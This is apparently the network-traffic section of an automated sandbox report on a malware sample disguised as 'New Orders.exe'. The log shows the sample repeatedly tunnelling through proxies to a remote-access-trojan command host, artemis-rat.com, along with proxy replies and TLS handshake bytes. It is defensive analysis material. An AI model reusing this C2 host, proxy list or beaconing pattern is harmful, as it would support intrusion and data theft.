                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        202192.168.2.950360103.190.54.14180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.444675922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        203192.168.2.94979564.227.108.25319087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.450650930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        204192.168.2.95047318.135.211.18231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.451726913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.743128061 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        205192.168.2.950591185.238.228.202807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.452125072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.607640982 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        206192.168.2.950576104.238.111.107562257672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.454937935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.913692951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.444994926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.507467985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.664199114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976593971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.179686069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.476598024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.976556063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        207192.168.2.950593104.25.87.42807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.455037117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.610124111 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        208192.168.2.950594104.21.223.181807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.455363989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.610503912 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        209192.168.2.95054423.95.209.142156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.460252047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        210192.168.2.95051972.10.160.9251237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.460887909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        211192.168.2.949805207.180.234.220458767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.472714901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        212192.168.2.9504853.127.62.252807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.472848892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.776098013 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:40.777184010 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 58 2a b5 45 fa 36 98 17 a2 13 0f 53 af 69 7e af 25 78 77 9e 89 b7 c6 49 72 50 1d 65 49 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e X*E6Si~%xwIrPeI*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:41.080202103 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 36 7a 36 3a bb 8f a9 65 c1 db 04 2e a9 b9 35 c7 b9 20 7e a4 66 a0 97 cf 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =96z6:e.5 ~fDOWNGRD0000*H010Uartemis-rat.com0240311150936Z260311150936Z010Uartemis-rat.com0"0*H0aB,7D
                                                                                        Mar 11, 2024 16:16:41.684616089 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 40 13 ba 77 ac 89 f5 37 ba 68 d6 7e b6 8f 05 bb 19 19 4c 1a 8c 1c df 3c a2 8e 31 43 c8 3e 92 2f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 a0 8a 0a 53 87 d6 df c0 3d 53 39 a8 1d e6 aa 00 8f 90 9a 77 11
                                                                                        Data Ascii: %! @w7h~L<1C>/(S=S9w$faF<
                                                                                        Mar 11, 2024 16:16:41.986591101 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 af 59 33 e3 b1 27 c7 23 59 35 d4 5d fc 6e fc ac f8 8e b0 3a 58 db ce 56 79 d2 21 af 6d 88 c4 fa 4c 5b 20 60 ba 08 de 58
                                                                                        Data Ascii: (Y3'#Y5]n:XVy!mL[ `X


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        213192.168.2.950440124.198.74.90269767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.476147890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.414838076 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        214192.168.2.950617104.16.109.207807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.479661942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.635004044 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        215192.168.2.95054072.10.160.90243977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.479804039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.924108028 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        216192.168.2.95055423.152.40.1431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.485333920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        217192.168.2.950509190.153.121.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.497340918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        218192.168.2.9505753.212.148.19931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.502643108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.733336926 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        219192.168.2.95056672.10.164.17855297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.505083084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.333528996 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        220192.168.2.950506121.159.146.251807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.505094051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        221192.168.2.950507174.64.199.7941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.505337000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        222192.168.2.950477112.78.164.24880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.509464979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.811773062 CET202INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 711
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        223192.168.2.95048995.66.138.2188807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.514698029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        224192.168.2.950492103.105.76.21490907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.534929037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.196198940 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        225192.168.2.950663104.16.108.42807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.535054922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.689188004 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
